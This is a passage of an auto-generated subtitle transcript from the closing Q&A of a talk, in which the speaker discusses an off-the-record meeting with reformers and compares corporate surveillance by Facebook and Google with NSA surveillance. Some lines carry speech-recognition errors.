00:50:35,000 Not more than I said on my blog. 800 00:50:35,000 --> 00:50:37,000 The meeting happened. 801 00:50:37,000 --> 00:50:39,000 It was kind of weird. 802 00:50:39,000 --> 00:50:41,000 I mean, the meeting was, we said we off the record. 803 00:50:41,000 --> 00:50:45,000 And it was a candid, interesting conversation with people who were reformminded. 804 00:50:45,000 --> 00:50:52,000 And I'd like to give them as much leeway and ability to do what they want to do as possible. 805 00:50:52,000 --> 00:50:55,000 So I'm not going to say anything. 806 00:50:55,000 --> 00:51:01,000 I'm not used to, you know, that kind of good guys and all sides of the aisle, so it was really kind of neat. 807 00:51:01,000 --> 00:51:06,000 How does the alignment of public companies and their, what their interests are playing at this? 808 00:51:06,000 --> 00:51:10,000 Because you still have, you know, private companies rather. 809 00:51:10,000 --> 00:51:11,000 Who do have different interests? 810 00:51:11,000 --> 00:51:16,000 And so, you know, they're developing potentially models that, you know, undo undermind some of the privatization. 811 00:51:16,000 --> 00:51:19,000 Or the privacy kind of interests that you're talking about. 812 00:51:19,000 --> 00:51:22,000 So if you have public, um, or corporations that are doing one thing, 813 00:51:22,000 --> 00:51:24,000 and then you kind of, you can see interest of what you're talking about. 814 00:51:24,000 --> 00:51:28,000 How do you, how does all that tie in together in two-a solution? 815 00:51:28,000 --> 00:51:32,000 I'm worried a lot about, about private corporation surveillance. 816 00:51:32,000 --> 00:51:34,000 I mean, I'm worried a lot about surveillance as a business model. 817 00:51:34,000 --> 00:51:38,000 The internet. I'm worried about, I mean, in it, read this recently. 818 00:51:38,000 --> 00:51:43,000 Someone said, well, you should worry less about the NSA because they're trying to take against terrorism as opposed to, you know, 819 00:51:43,000 --> 00:51:48,000 Facebook and Google who are trying to psychologically manipulate you to buy things. 820 00:51:48,000 --> 00:51:53,000 Right? So on the, on the one hand, that makes sense on the other hand. 821 00:51:53,000 --> 00:51:56,000 The, the false alarm problem is really different. 822 00:51:56,000 --> 00:52:00,000 Right? If the, if the, if Facebook gets through, I'm going to show you an ad for Chevy, you don't want to, 823 00:52:00,000 --> 00:52:03,000 if the NSA gets through, I'm going to drop a drone on your head. 824 00:52:03,000 --> 00:52:07,000 So, so there's differences there. I think both are worried. 825 00:52:07,000 --> 00:52:09,000 I think the interplay is a big problem. 826 00:52:09,000 --> 00:52:13,000 And I, that's why I think this, this is a bigger question than the NSA. 827 00:52:13,000 --> 00:52:15,000 The NSA just want to aspect of this. 828 00:52:15,000 --> 00:52:19,000 I'm having watches wave that me from all directions, so the rest of you in line, 829 00:52:19,000 --> 00:52:21,000 I'm really sorry. I'll be out there. 830 00:52:21,000 --> 00:52:23,000 Thank you very much. 831 00:52:23,000 --> 00:52:35,000 Thank you.